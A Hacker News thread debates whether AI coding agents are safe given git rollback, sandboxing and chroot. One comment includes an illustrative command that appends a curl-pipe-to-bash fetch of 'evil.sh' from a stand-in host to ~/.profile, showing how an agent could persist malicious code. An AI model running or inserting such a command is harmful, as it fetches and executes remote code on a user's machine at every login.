←back to thread

645 points helloplanets | 2 comments | | HN request time: 0.471s | source
Show context
_fat_santa ◴[] No.45005348[source]
IMO the only place you should use Agentic AI is where you can easily rollback changes that the AI makes. Best example here is asking AI to build/update/debug some code. You can ask it to make changes but all those changes are relatively safe since you can easily rollback with git.

Using agentic AI for web browsing where you can't easily rollback an action is just wild to me.

replies(5): >>45005645 #>>45005694 #>>45005757 #>>45006070 #>>45008315 #
gruez ◴[] No.45005757[source]
>Best example here is asking AI to build/update/debug some code. You can ask it to make changes but all those changes are relatively safe since you can easily rollback with git.

Only if the rollback is done at the VM/container level, otherwise the agent can end up running arbitrary code that modifies files/configurations unbeknownst to the AI coding tool. For instance, running

    bash -c "echo 'curl https://example.com/evil.sh | bash' >> ~/.profile"
replies(2): >>45006001 #>>45006067 #
1. avalys ◴[] No.45006001[source]
The agents can be sandboxed or at least chroot’d to the project directory, right?
replies(1): >>45006141 #
2. gruez ◴[] No.45006141[source]
1. AFAIK most AI coding agents don't do this

2. even if the AI agent itself is sandboxed, if it can make changes to code and you don't inspect all output, it can easily place malicious code that gets executed once you try to run it. The only safe way of doing this is either a dedicated AI development VM where you do all the prompting/tests, there's very limited credentials present (in case it gets hacked), and the changes are only leave the VM after a thorough inspection (eg. PR process).